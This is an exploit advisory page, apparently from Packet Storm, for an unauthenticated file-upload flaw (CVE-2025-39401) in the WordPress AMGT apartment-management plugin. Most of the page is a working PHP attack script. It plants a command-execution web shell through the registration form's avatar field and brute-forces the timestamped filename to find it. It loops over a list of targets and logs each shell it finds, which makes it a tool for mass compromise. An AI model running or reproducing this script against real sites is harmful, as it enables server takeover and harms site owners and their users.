Share
## https://sploitus.com/exploit?id=PACKETSTORM:216523
=============================================================================================================================================
| # Title : WordPress AMGT 44.0 RCE Exploit |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.2 (64 bits) |
| # Vendor : https://wordpress.com/plugins/browse/apartment-management |
=============================================================================================================================================
[+] References : https://packetstorm.news/files/id/212164/ & CVE-2025-39401
[+] Summary : A vulnerability in the AMGT membership registration form allows an attacker to upload arbitrary files via the "amgt_user_avatar" parameter. The uploaded
file is stored with a timestamp-based filename that can be guessed, allowingremote code execution. – PHP Multi‑Target PoC
[+] Affected :
Any WordPress installation running AMGT plugin.
[+] Impact :
Full Remote Code Execution (RCE) in the server’s context.
[+] Requirements :
No authentication required.
[+] Notes :
This PHP PoC supports :
- Multi-threading simulation using curl_multi
- Timestamp brute forcing
- Cross‑platform compatibility (Linux/Windows/macOS/BSD)
- Custom markers to validate shell execution
- Randomized payload and alternative bypass strategies
[+] Usage :
See instructions at the bottom of this report.
[+] POC :
<?php
/**
*by Indoushka (Nekaa Salah eddine)
*/
error_reporting(0);
$USER_AGENT = "Mozilla/5.0 (Windows NT 10.0; Win64; x64)";
$SUCCESS_FILE = "success_results.txt";
$UPLOADED_FILE = "uploaded_shells.txt";
$SHELL_LOCAL_FILE = "shell.php";
$INITIAL_SLEEP = 5;
$RETRIES = 8;
$BETWEEN_RETRIES = 4;
$WINDOW = 5;
/* ------------------------- SHELL PAYLOAD ------------------------------ */
$default_shell_payload = <<<PAYLOAD
<?php
echo "<b>Indoushka_RCE</b>\\n";
system(\$_GET['cmd']);
?>
PAYLOAD;
/* Save shell if missing */
if (!file_exists($SHELL_LOCAL_FILE)) {
file_put_contents($SHELL_LOCAL_FILE, $default_shell_payload);
}
/* ---------------------- HELPERS ------------------------- */
function write_result($file, $value) {
file_put_contents($file, $value . PHP_EOL, FILE_APPEND);
}
function generate_filename($original, $ts, $mark = "pimg") {
$ext = pathinfo($original, PATHINFO_EXTENSION);
return "{$ts}-{$mark}-in.{$ext}";
}
function http_post($url, $fields, $files, $ua) {
$curl = curl_init();
curl_setopt_array($curl, [
CURLOPT_URL => $url,
CURLOPT_RETURNTRANSFER => true,
CURLOPT_SSL_VERIFYPEER => false,
CURLOPT_SSL_VERIFYHOST => false,
CURLOPT_USERAGENT => $ua,
CURLOPT_POST => true,
CURLOPT_POSTFIELDS => array_merge($fields, $files),
CURLOPT_TIMEOUT => 30
]);
$resp = curl_exec($curl);
$status = curl_getinfo($curl, CURLINFO_HTTP_CODE);
curl_close($curl);
return [$status, $resp];
}
function http_get($url, $ua) {
$curl = curl_init();
curl_setopt_array($curl, [
CURLOPT_URL => $url,
CURLOPT_RETURNTRANSFER => true,
CURLOPT_SSL_VERIFYPEER => false,
CURLOPT_SSL_VERIFYHOST => false,
CURLOPT_USERAGENT => $ua,
CURLOPT_TIMEOUT => 20
]);
$resp = curl_exec($curl);
$status = curl_getinfo($curl, CURLINFO_HTTP_CODE);
curl_close($curl);
return [$status, $resp];
}
/* ------------------- EXPLOIT FUNCTION --------------------- */
function exploit_target($target_url, $marker) {
global $USER_AGENT,
$SHELL_LOCAL_FILE, $SUCCESS_FILE, $UPLOADED_FILE,
$INITIAL_SLEEP, $RETRIES, $BETWEEN_RETRIES, $WINDOW;
if (!file_exists($SHELL_LOCAL_FILE)) {
echo "[ERROR] Missing shell file.\n";
return;
}
$ts = time();
$email = "indoushka_{$ts}@exploit.com";
echo "\n[+] Uploading shell to: $target_url\n";
$upload_url = rtrim($target_url, "/") . "/apartment-management-member-registration-page/";
$fields = [
"building_id" => "1",
"unit_cat_id" => "2",
"unit_name" => "Unit-X",
"member_type" => "Owner",
"first_name" => "Indo",
"last_name" => "Ushka",
"gender" => "male",
"birth_date" => "1990-01-01",
"mobile" => "99887766",
"email" => $email,
"password" => "Indo1337!",
"registration_front_member" => "1"
];
$files = [
"amgt_user_avatar" => new CURLFile($SHELL_LOCAL_FILE)
];
http_post($upload_url, $fields, $files, $USER_AGENT);
echo "[+] Uploaded. Sleeping {$INITIAL_SLEEP}s...\n";
sleep($INITIAL_SLEEP);
echo "[+] Brute-forcing timestamp window...\n";
for ($attempt = 0; $attempt < $RETRIES; $attempt++) {
for ($d = -$WINDOW; $d <= $WINDOW; $d++) {
$guess = $ts + $d + $attempt;
$name = generate_filename($SHELL_LOCAL_FILE, $guess);
$shell_url = rtrim($target_url, "/") . "/wp-content/uploads/apartment_assets/" . $name;
list($code, $body) = http_get($shell_url, $USER_AGENT);
if ($code == 200 && strpos($body, $marker) !== false) {
echo "[✓] SHELL FOUND: $shell_url\n";
write_result($SUCCESS_FILE, "$target_url | $shell_url");
write_result($UPLOADED_FILE, $shell_url);
return;
}
echo "[x] $code → $shell_url\n";
}
sleep($BETWEEN_RETRIES);
}
echo "[✗] Not found.\n";
}
/* ------------------ MAIN ------------------ */
echo "\n=== AMGT PHP Exploit by Indoushka ===\n";
$list = readline("Enter targets file (e.g., list.txt): ");
$marker = readline("Enter shell marker (default: Indoushka_RCE): ");
if (!$marker) $marker = "Indoushka_RCE";
$targets = file($list, FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES);
foreach ($targets as $t) {
exploit_target(trim($t), $marker);
}
echo "\nDone. Results saved.\n";
Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================